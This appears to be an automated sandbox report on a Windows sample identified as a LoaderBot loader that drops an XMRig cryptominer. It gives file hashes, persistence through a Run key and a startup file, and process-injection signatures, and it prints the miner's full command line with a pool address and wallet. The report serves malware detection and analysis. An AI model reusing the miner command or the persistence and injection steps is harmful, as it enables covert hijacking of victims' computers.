Analysis
-
max time kernel
91s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
25-12-2023 14:10
Static task
static1
Behavioral task
behavioral1
Sample
245f2e7c93f989165dc8d410823c4023.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
245f2e7c93f989165dc8d410823c4023.exe
Resource
win10v2004-20231222-en
General
-
Target
245f2e7c93f989165dc8d410823c4023.exe
-
Size
1.9MB
-
MD5
245f2e7c93f989165dc8d410823c4023
-
SHA1
d82877fdf16e0091957d6ac9cefc638e08694c91
-
SHA256
170f1bfffbf3fa5ec4cac475209b00e9e8478565c79cb28fa442fabf89ba9079
-
SHA512
1fbb6fd0f6743e3e595570a4e6fdb3fa0a7bc2a7aed16ce72ad8e349770c1d181e681600381e0ff5016612637a2be632e5e03dae011fe768502a381f95aff865
-
SSDEEP
49152:pM2OSAUhB0ETI++BrpMLdDQXWb+FPWRjl:pM2DD5IhBrpCFQXk+FPWFl
Malware Config
Signatures
-
LoaderBot executable 5 IoCs
resource yara_rule behavioral1/memory/2792-5-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot behavioral1/memory/2792-9-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot behavioral1/memory/2792-7-0x0000000000400000-0x00000000007FE000-memory.dmp loaderbot behavioral1/memory/2792-21-0x0000000006640000-0x00000000071B5000-memory.dmp loaderbot behavioral1/memory/2792-61-0x0000000006640000-0x00000000071B5000-memory.dmp loaderbot -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/2576-24-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/2576-23-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/2904-31-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/2904-32-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/2096-38-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1960-44-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1472-49-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1532-55-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig behavioral1/memory/1800-63-0x0000000140000000-0x0000000140B75000-memory.dmp xmrig -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url 245f2e7c93f989165dc8d410823c4023.exe -
Executes dropped EXE 7 IoCs
pid Process 2576 Driver.exe 2904 Driver.exe 2096 Driver.exe 1960 Driver.exe 1472 Driver.exe 1532 Driver.exe 1800 Driver.exe -
Loads dropped DLL 2 IoCs
pid Process 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\245f2e7c93f989165dc8d410823c4023.exe" 245f2e7c93f989165dc8d410823c4023.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2516 set thread context of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe 2792 245f2e7c93f989165dc8d410823c4023.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2792 245f2e7c93f989165dc8d410823c4023.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2516 245f2e7c93f989165dc8d410823c4023.exe Token: SeDebugPrivilege 2792 245f2e7c93f989165dc8d410823c4023.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2516 wrote to memory of 2860 2516 245f2e7c93f989165dc8d410823c4023.exe 28 PID 2516 wrote to memory of 2860 2516 245f2e7c93f989165dc8d410823c4023.exe 28 PID 2516 wrote to memory of 2860 2516 245f2e7c93f989165dc8d410823c4023.exe 28 PID 2516 wrote to memory of 2860 2516 245f2e7c93f989165dc8d410823c4023.exe 28 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2516 wrote to memory of 2792 2516 245f2e7c93f989165dc8d410823c4023.exe 29 PID 2792 wrote to memory of 2576 2792 245f2e7c93f989165dc8d410823c4023.exe 32 PID 2792 wrote to memory of 2576 2792 245f2e7c93f989165dc8d410823c4023.exe 32 PID 2792 wrote to memory of 2576 2792 245f2e7c93f989165dc8d410823c4023.exe 32 PID 2792 wrote to memory of 2576 2792 245f2e7c93f989165dc8d410823c4023.exe 32 PID 2792 wrote to memory of 2904 2792 245f2e7c93f989165dc8d410823c4023.exe 35 PID 2792 wrote to memory of 2904 2792 245f2e7c93f989165dc8d410823c4023.exe 35 PID 2792 wrote to memory of 2904 2792 245f2e7c93f989165dc8d410823c4023.exe 35 PID 2792 wrote to memory of 2904 2792 245f2e7c93f989165dc8d410823c4023.exe 35 PID 2792 wrote to memory of 2096 2792 245f2e7c93f989165dc8d410823c4023.exe 37 PID 2792 wrote to memory of 2096 2792 245f2e7c93f989165dc8d410823c4023.exe 37 PID 2792 wrote to memory of 2096 2792 245f2e7c93f989165dc8d410823c4023.exe 37 PID 2792 wrote to memory of 2096 2792 245f2e7c93f989165dc8d410823c4023.exe 37 PID 2792 wrote to memory of 1960 2792 245f2e7c93f989165dc8d410823c4023.exe 40 PID 2792 wrote to memory of 1960 2792 245f2e7c93f989165dc8d410823c4023.exe 40 PID 2792 wrote to memory of 1960 2792 245f2e7c93f989165dc8d410823c4023.exe 40 PID 2792 wrote to memory of 1960 2792 245f2e7c93f989165dc8d410823c4023.exe 40 PID 2792 wrote to memory of 1472 2792 245f2e7c93f989165dc8d410823c4023.exe 42 PID 2792 wrote to memory of 1472 2792 245f2e7c93f989165dc8d410823c4023.exe 42 PID 2792 wrote to memory of 1472 2792 245f2e7c93f989165dc8d410823c4023.exe 42 PID 2792 wrote to memory of 1472 2792 245f2e7c93f989165dc8d410823c4023.exe 42 PID 2792 wrote to memory of 1532 2792 245f2e7c93f989165dc8d410823c4023.exe 44 PID 2792 wrote to memory of 1532 2792 245f2e7c93f989165dc8d410823c4023.exe 44 PID 2792 wrote to memory of 1532 2792 245f2e7c93f989165dc8d410823c4023.exe 44 PID 2792 wrote to memory of 1532 2792 245f2e7c93f989165dc8d410823c4023.exe 44 PID 2792 wrote to memory of 1800 2792 245f2e7c93f989165dc8d410823c4023.exe 46 PID 2792 wrote to memory of 1800 2792 245f2e7c93f989165dc8d410823c4023.exe 46 PID 2792 wrote to memory of 1800 2792 245f2e7c93f989165dc8d410823c4023.exe 46 PID 2792 wrote to memory of 1800 2792 245f2e7c93f989165dc8d410823c4023.exe 46
Processes
-
C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe"C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exeC:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe2⤵PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exeC:\Users\Admin\AppData\Local\Temp\245f2e7c93f989165dc8d410823c4023.exe2⤵
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2792 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:2576
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:2904
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:2096
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:1960
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:1472
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:1532
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 43⤵
- Executes dropped EXE
PID:1800
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5f4353ed73400389126375354efb8b419
SHA17f61401faba07c014d5c246b8edd117fa7694d3a
SHA256ea397f4fec78d1a6c6e58b5d61fe976416e2dfc23b7e26d3b520f03919b768d8
SHA512ffee4e0870be6ed7b5380c59933e23ca8c5a1d2ea60f0e9ceaaeaec05b8909e00bee002f76cca6e224a7e2b1febc13af110818755cbfa66680e0476ff552c478
-
Filesize
384KB
MD553e0a533db41d97ae6fef326f579afcc
SHA12646cf4f8c135975eba1aa299ec694e3c03dc98d
SHA256bc2b168527c4befeed778f4ef880298db727d9010b9feb9902538f3d0377e025
SHA512f9e47fb5a02d967196a912f641d9de1ab68b64d988b1133d015ebae3f3eb15186033ff2106cd6e3c0c73ef735f86edd3e16a9f0fb358c7e22033103a56b5a416
-
Filesize
236KB
MD53ff6731e6d4dc7db3084f9619f632cf3
SHA1812c9ad80aba1f23ba34ffb6d6e9673141a73146
SHA256fbc8cf40a680d466a3d50f28a78b463596541dac165d859a7fe4163d25ad11f8
SHA512c68595c33c4bef511f6e1b6c2df463e1c429dfeed73396c63be787381bf6315d2a3bbcd5825dc057d6d1af22e369a784ceaa29aa69f0321700a732bb6cb3bd15
-
Filesize
513KB
MD5e4c9d6e2766e701ece13e9c3bcdff2a5
SHA159af10a6e3c9e0831a5fb4ad74caf107cda76679
SHA256ef186c26b6ba61efadef43a873668c2cf1d3c48deca0080c09c8ae699fc5d41c
SHA512995ac69018f937da43bb39833920fb8c54717afad8bc74e31498c67114d59e1694bd2ba1eb77ee7ac1cd77b74ee9077a7eb32d4e67077b225c5c4611fbe91e2b
-
Filesize
416KB
MD5765ab1497126c01b6a884988f243fb52
SHA1051dd5bb03245ae8240d53453c9e8d5b57073764
SHA256e7b189078f0b86b57e9efc06cee68d535a16ee476209b824f973251d22a71fb8
SHA512ba52bafa54e403d2ca16ca9cda0c5d2a364ac8e83d70aade9c4a9ae0f7820cd05a42cf28cfa5ea4b8ba13afb1c5bbe48041396d308a7c866de7070ca24b0ae62
-
Filesize
514KB
MD5355fc74aa15be162bcf6add7d91715bf
SHA1c28fc54aa52573ee1dca0165b24e343fb1a589ec
SHA2569b387a7a219951dd588bd1eaafbe18a76b179d0b9e182dd9a7bbf823683b8c66
SHA512c7a5cd7c2cca4c6be49d60e0634a9d2d523a88f9bf863d7b59c0b70808a702b9b7c332a18617e0b79b697e80266b89036423fb8990b4a4a08ad76017174c6c52
-
Filesize
450KB
MD5d58e96bedcff001424678959709175b9
SHA13b5f3d9a75b1f86b81143a3e9f74b3cf48159dbb
SHA2569b16495f8872080d5d74442e6a013255b74b46b2e6e0e129fcfa5a7c6afc16f4
SHA512a714f0300bf60683f196b38b8893bcd9b7f3b5fc3da71b8a6a7214ed6225bd9f6c70303125f6e626f5f368601a55340955c93f150ddd72294f4c08a488eaa69a
-
Filesize
346KB
MD59be330200e5e27a9e664e22bbaef4a5e
SHA1278af61418287309e5c1ae38439ded04da0ccdce
SHA2566d02015ba5a8d951be6afd0711e43bda2bdedab44aefa37ef9f63a6546824ebe
SHA51217c452ac617679c2e5b2395ef3cde35d74c72ea4a1f0a3a1e370be2c47310de6adcd6288fef6278caf158a422d698f85c8e5efab6ee9af961218be2cc579074c
-
Filesize
2.4MB
MD551f09d262dd89cb03482d521f295daa6
SHA11b7a113cae9e3f68eadfedc6838c61d7a6436e15
SHA256eae202bed9eea920989aad6723282b049a05109ff85ed03ffa6ec4b80e3e346c
SHA512d226d34564953f9ac1139208b7f5747c8ed7382574e7b65932192a83e8288a9d8813b4820f67dfeff8c70e75b50aca6d22e46fd5cb4c7ee49d486e301a84d80c
-
Filesize
164KB
MD51f1a1022cbc49a3210b8c1e430ea41e3
SHA173ec2c1848e3cff97e00ba922a62ce94703ee1df
SHA256d03286e9214f2a4199dbfa150f5fb14a2e4bd4de568845b809cd35f3cc4cbbd6
SHA512f3a39b935ac2e62ae9e12f0c43b249cae21ea0bda7cdd54d471fda32e470ecc8326d5cf5142c1f2e48aa8287ec507b48bd1d0c80892ba43473b1baaa7245f6b0